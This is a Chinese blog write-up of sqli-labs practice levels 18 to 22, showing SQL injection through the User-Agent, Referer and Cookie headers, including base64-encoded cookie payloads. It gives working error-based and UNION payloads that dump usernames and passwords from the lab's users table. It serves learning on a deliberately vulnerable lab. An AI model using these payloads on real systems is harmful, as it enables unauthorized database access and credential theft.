sqli-labs基础篇 第18~22关

最新推荐文章于 2024-08-31 15:20:56 发布
最新推荐文章于 2024-08-31 15:20:56 发布
阅读量2.4k 收藏 3
点赞数 3
分类专栏: Web安全 文章标签: 安全 数据库 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47126666/article/details/128751519
版权
文章详细介绍了几种不同类型的HTTP头注入攻击,包括基于POST错误的Uagent字段、Referer字段和Cookie头部的注入。通过分析源码、构造payload,展示了如何利用这些注入点进行数据库爆库和数据提取。此外,还提到了Base64编码在Cookie注入中的应用。
摘要由CSDN通过智能技术生成

【第十八关】基于POST错误的Uagent字段数据头注入

Ⅰ 判断注入点

用常规注入、报错注入、延时注入、布尔注入都不行。
看一下题目,一直显示我的IP地址
image.png
直接看源码,第一眼就是一个check_input()函数,用于检查输入参数的正确性
image.png
再往下看源码,发现存在检查账号密码,代码中对uname和passwd进行了check_input()函数的处理,在输入uname和passwd上进行注入是不行的。
所以必须知道一个密码,这道题有点像越权漏洞,通过一个已知账号,寻找其他用户账号密码
image.png
直接弱密码,amdin+admin,发现登录进去,我们便知道了一个条件,再往下看源码
这句话,将useragent和ip插入到数据库中,那么我们是不是可以用这个来进行注入呢?首先这里要输入正确的账号和密码才能绕过账号密码判断,才能进入处理uagent部分
image.png
抓包,修改useragent信息头

-- 直接在uer Agent 后面拼接报错注入
uerAgent

image.png
构造playload,成功

-- uagent,ip_address,username
1' 1,1)#

image.png

Ⅱ 常规报错注入

(1)爆数据库

User-Agent: 1' ,1,extractvalue('anything',concat('~',(select database()),'~')))#

image.png

(2)其余操作跟十七关一样,直接爆数据

User-Agent: 1' ,1,extractvalue('anything',concat('~',(select group_concat(username,'~',password) from security.users),'~')))#

image.png

参考资料:

【第十九关】基于POST错误的Referer字段数据头注入

Ⅰ 判断注入点

直接常规的注入,是看不出来变化,直接看源码,跟十八关很像
源码上,存在两个信息

  • 账号密码有检测,必须知道一个账号密码

image.png

  • 存在数据包注入,通过注入referer和ip_address,进行报错回显

image.png

构造playload

1',1)#
-- 多出一个闭合

image.png

Ⅱ 常规注入

爆数据库

Referer: http://sqli.exp-9.com/Less-19/1',extractvalue('anything',concat('~',(select database()),'~')))#

image.png
爆数据

Referer: http://sqli.exp-9.com/Less-19/1',extractvalue('anything',concat('~',(select group_concat(username,'~',password) 
from security.users),'~')) )#

image.png

【第二十关】基于错误的cookie头部POST注入

Ⅰ 判断注入点

image.pngimage.png
直接输入已知账号密码admin+admin,显示这个,
提示我的cookie为“uname=admin~~~~”,结合源码,可以知道需要用cookie进行注入
image.png
构造playload

Cookie: uname=admin' #

image.png

Ⅱ cookie注入

Cookie: uname=admin' and extractvalue('~',concat('~',( select database() ),'~') ) #

image.png
爆数据

Cookie: uname=admin' and extractvalue('anything',concat('~',(select group_concat(username,'~',password) from security.users),'~'))#

image.png

【第二十一关】基于base64编码单引号的Cookie注入

Ⅰ 判断注入点

直接输入已知账号密码,显示出被base64编码的adminimage.png

image.png
构造playload

Cookie: uname=base64编码后的sql注入语句

判断注入点

Cookie: uname=admin' and 1=1 --+
Cookie: uname=YWRtaW4nIGFuZCAxPTEgLS0r

发现存在“')”,也就是单引号+闭合注入

image.png
image.png

Ⅱ cookie编码注入

构造playload

Cookie: uname = admin') XXXXX #

爆数据库

-admin') union select database(), 2,3 # -- 明文

LWFkbWluJykgdW5pb24gc2VsZWN0IDEsZGF0YWJhc2UoKSwzICM= -- 密文

image.png

直接跳到拿数据库

-admin') union select 1,(select concat_ws('~',username,password) from security.users ),3 # -- 明文
LWFkbWluJykgdW5pb24gc2VsZWN0IDEsKHNlbGVjdCBjb25jYXRfd3MoJ34nLHVzZXJuYW1lLHBhc3N3b3JkKSBmcm9tIHNlY3VyaXR5LnVzZXJzICksMyAj -- 密文

image.png
image.png

【第二十二关】基于base64编码双引号的Cookie注入

Ⅰ 判断注入点

首先感觉这个很玄虚,一开始我是知道是用双引号注入的,然后就用这句admin",去编码,并注入,并没有回显任何的信息,然后过了几分钟,再试一下,发现又可以了
注入单引号时,没有报错
注入双引号,报错,提示只有双引号
image.pngimage.png

构造playload

Cookie: uname=admin" XXX #

Ⅱ 直接爆数据

-admin" union select 1,(select group_concat('~',username,password) from security.users limit 0,1),3 #


LWFkbWluIiB1bmlvbiBzZWxlY3QgMSwoc2VsZWN0IGdyb3VwX2NvbmNhdCgnficsdXNlcm5hbWUscGFzc3dvcmQpIGZyb20gc2VjdXJpdHkudXNlcnMgbGltaXQgMCwxKSwzICM=

image.png

Lucky小小吴
关注
专栏目录
Sqli-labs靶场第18详解[Sqli-labs-less-18]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 1286
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。使用单引号' 测试得到了报错即: ' 为闭合方式。在user-agent处加上*代表注入点。
Sqli-labs-master超详细通教程(1-23基础
m0_67391270的博客
06-12 3327
一到四主要是参数被包装的问题。一般用于尝试的语句Ps:–+可以用#替换,url 提交过程中 Url 编码后的#为%23and1=2–+'and1=2–+"and1=2–+)and1=2–+')and1=2–+")and1=2–+"))and1=2–+图中显示的sql语句是我为了方便理解,修改了源代码显示出的id =1 and 1=2页面正常,考虑是否有字符注入,先加单引号可以看到提示,存在’ '包装,我们加上–+http://127.0.0.1:8080/sqli-labs-master/Less-1/?
SQLI-labs-第十八
weixin_54055099的博客
05-17 644
Sqli-labs18,http头部注入,报错注入
Sqli-labs(1到18)
最新发布
qq_61740845的博客
08-31 826
通过id=1'判断他url出存在注点闭合方式为单引号使用and1=2判断他使用数字注入通过id=1' order by 4 -- - 判断它可以回显三列通过id=0' union select 1,2,3 -- -判断只有2,3位可以回显。
sqli-labs--------第18
wyzhxhn的博客
11-10 1282
sql插入语句 User-Agent
sqli-labs第十八
yuqnqi的博客
05-10 426
通过注入点测试填写正确的账户密码可以获得浏览器标识符,所以应该是通过浏览器标识符进行注入,为确认一下猜测是否正确,查看一下源码。注入点在 uagent处,确定注入点后,输入SQL语句。可以参考前面的单引号注入,比如第十一,我就先溜了。页面提示user agent。接下来就正常的注入了。
sqli-labs第十八~第二十二
yuqnqi的博客
05-13 957
这几均为请求头注入,请求头记录的信息可以拼接到SQL语句上,User-Agent ,浏览器身份标识字符串Referer,表示浏览器访问的前一个页面,可以认为是之前访问页面的连接件浏览器带到了当前页面Accept ,可接受的响应内容类型(Content-Type)X-Forwarded-For, 可以用来表示http请求真实IPDate,发送该消息的日期和时间第十八暴库名爆表名爆字段名爆数据。
windows环境下安装sqli-labs
11-04
Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在安装 sqli-labs 之前,我们需要准备好以下...
最详细sqli-labs平台前十讲解
妙蛙种子吃了都会妙妙秒的妙脆角的博客
01-10 3600
最详细sqli-labs平台sql注入语法讲解 文章目录最详细sqli-labs平台sql注入语法讲解一、sql注入的简单介绍二、sqli-labs平台的搭建二、实验1.Less-1(single quotes)2.Less-2(intiger based)3.Less-3(single quotes with twist)4.Less-4(double quotes)5.Less-5 最近也是沉迷于学习sql注入,越是了解越是发现其中的奥妙与乐趣,在这文章中主要是以sqli-labs平台为例子,记录一些
sqli-labs-master第八
FourthGuy的博客
10-09 1661
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码
sqli-labs Less-5~6(sqli-labs闯指南 5—6)--盲注
m0_54899775的博客
12-15 1213
sqli-labs Less-5~6(sqli-labs闯指南 5—6)--盲注 sqli-labs Less 5 sqli-labs Less 6
sqli-labs18(基于http头部报错盲注)通思路
zyh1588的博客
11-18 2072
小白回顾sql靶场第18
Sqlilabs-18
KAKA的博客
07-09 901
来到了 18 18 同样也是在 UPDATE 上面做手脚,但是限制更加严格,不仅对 username 对 password 也做了 check_input 再看看后台 SQL 语句的构造: insert="INSERTINTO‘security‘.‘uagents‘(‘uagent‘,‘ipaddress‘,‘username‘)VALUES(′insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`)
sqli.labs靶场(第18~22
喜欢创作各种技术类文章,希望可以帮到你
01-28 1993
sqli.labs靶场第1822详情
sqli-labs(18)
2302_78903258的博客
05-25 356
这里最重要的是第5点,简单来说我们可以在user-agent里进行注入,但注入的参数要符合sql 语句的要求,所以我们在user-name里注入的参数有3个,并且要对uagent参数进行闭合。: 这是一个SQL查询语句,目的是从名为'users'的表格中选择用户名和密码与用户输入匹配的行。首先,随便输入账号密码,然后进行抓包,当页面显示uagent的时候,我们可以想到uagent注入。: 这是一个SQL插入语句,将用户代理、IP地址和用户名插入到名为'uagents'的表格中。
sql i-labs第十八
2301_81935750的博客
07-02 583
这下变成POST注入了,还是双参数。查看一下本地环境中,这题的源码。注入点应该是admin。
【渗透测试】sqli-labs闯(18-24)
qq_43168364的博客
08-22 934
第十八:user-agent单引号字符型注入点 方法:在user-agent上进行xpath报错注入 这一我们输入用户名和密码之后给我们回显除了user-agent的信息,我们猜想注入应当是发生在user-agent上的。我们首先看看源代码。 果然这里把user-agent插入了数据库,我们只需要闭合$uagent前后的单引号然后写上注入语句即可。我们首先得到表名,语法:' and ext......
SQL-labs的第18——http请求头注入(User-Agent)报错注入
qq_73393033的博客
07-21 513
并且,在判断闭合方式时,我们发现该网站会返回错误,说明该网站适合使用报错注入。我们这次使用extractvalue函数进行报错注入。我们在截取的数据包中的User-Agent上加上一个'。它显示了User-Agent,我们大胆猜测注入点在这里。通过改变mid函数的后面两个参数可以改变返回的内容。很显然,这里的数据没有显示完全。账号:admin ,密码:admin。这说明闭合方式就是'。
SQLi LABS Less-18 报错注入
热门推荐
wangyuxiang946的博客
06-22 1万+
第十八请求方式为 GET请求 , 注入点为User-Agent , 注入方式为 错误注入 第一步,判断注入方式 先看源码 后台代码对 特殊字符进行了过滤 , 常规的注入方式行不通 , 只有通过代码审计来判断注入方式 登录成功后 , 有一个保存用户主机信息的SQL语句 , 并且没有对参数进行过滤 , 我们可以针对这个SQL进行错误注入 真实场景中 , 我们可以先注册一个账号进行登录 , 登录成功后通过User-Agent 进行错误注入 , 从而实现脱库 使用 Burp...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值